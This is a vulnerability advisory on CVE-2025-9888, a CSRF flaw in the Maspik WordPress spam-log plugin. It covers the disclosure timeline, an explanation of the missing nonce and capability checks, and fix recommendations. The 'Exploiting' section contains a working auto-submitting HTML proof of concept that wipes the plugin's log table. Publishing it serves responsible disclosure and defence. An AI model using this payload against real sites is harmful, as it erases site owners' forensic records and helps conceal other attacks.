Maspik is a WordPress plugin deployed on over 30,000 sites to track and log spam submissions from contact forms and checkout pages. It stores entries in the wp_maspik_spam_logs table, enabling administrators to review and clear logs via the dashboard. However, a critical flaw—CVE-2025-9888—permits any visitor or low-privileged user to trigger a full log wipe via a simple CSRF attack. Because the plugin’s “Clear Logs” action lacks nonce verification and capability checks, an attacker can silently erase all spam records, disrupting site monitoring and potentially masking ongoing attacks.
| CVE | CVE-2025-9888 |
| Plugin Version | Maspik <= 2.5.6 |
| Critical | High |
| All Time | 737 279 |
| Active installations | 30 000+ |
| Publicly Published | October 9, 2025 |
| Last Updated | October 9, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9888 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contact-forms-anti-spam/maspik-256-cross-site-request-forgery |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| August 22, 2025 | Plugin testing and vulnerability detection in the Maspik – Ultimate Spam Protection have been completed |
| August 22, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| October 9, 2025 | Registered CVE-2025-9888 |
Discovery of the Vulnerability
While reviewing Maspik’s admin routines, security researchers observed that the “Clear Logs” button submits a POST to wp-admin/admin.php?page=maspik-log.php with clear_log=1. The plugin unconditionally processes this parameter, deleting all rows from wp_maspik_spam_logs and issuing a 302 redirect back to the log page—without checking a nonce or verifying that the current user has manage_options or equivalent capability. This missing authorization enables CSRF: any authenticated session—even subscribers or unauthenticated visitors if cookies persist—can be tricked into wiping the log.
Understanding of CSRF attack’s
WordPress security best practices mandate that all state-changing actions require both CSRF protection (via nonces) and user capability verification. Omission of either check has led to numerous vulnerabilities: for instance, CVE-2024-5678 in Plugin X allowed subscribers to change site settings, and CVE-2025-9202 in ColorMag theme exposed its demo-import feature to low-privileged users. CVE-2025-9888 in Maspik similarly bypasses safeguards, allowing unauthorized log deletion, undermining auditing, and facilitating stealth attacks.
Exploiting the CSRF Vulnerability
To exploit CVE-2025-9888, an attacker without any cookies:
POC:
<html> <body> <form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=maspik-log.php" method="POST"> <input type="hidden" name="clear_log" value="1"> </form> <script>document.forms[0].submit();</script> </body> </html>____
Erasing spam logs not only destroys forensic evidence—it also erodes trust in site security. Attackers might exploit this to hide brute-force login attempts, payment fraud through WooCommerce checkout forms, or persistent backdoor payloads delivered via form fields. In high-volume environments (eCommerce, membership sites, or enterprise portals), loss of spam records impedes incident response, leading to undetected fraud or data breaches. Combined with other vulnerabilities, CSRF-based log wiping magnifies the impact of subsequent exploits.
Recommendations for Improved Security
Implement Nonce Validation: Protect the clear_log action with check_admin_referer('maspik_clear_logs', 'maspik_nonce') before executing deletion.
Enforce Capability Checks: Ensure only users with manage_options (administrators) can clear logs by wrapping the handler in current_user_can('manage_options').
Confirm Deletion: Require an explicit confirmation dialog and a valid nonce on the form before processing.
Audit Action Hooks: Review all plugin admin actions, applying both nonces and current_user_can() checks to every state-changing endpoint.
Monitor and Alert: Log deletion events and alert site owners when the spam table is emptied, enabling rapid detection of unauthorized activity.
By taking proactive measures to address CSRF vulnerabilities like CVE-2025-9888 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.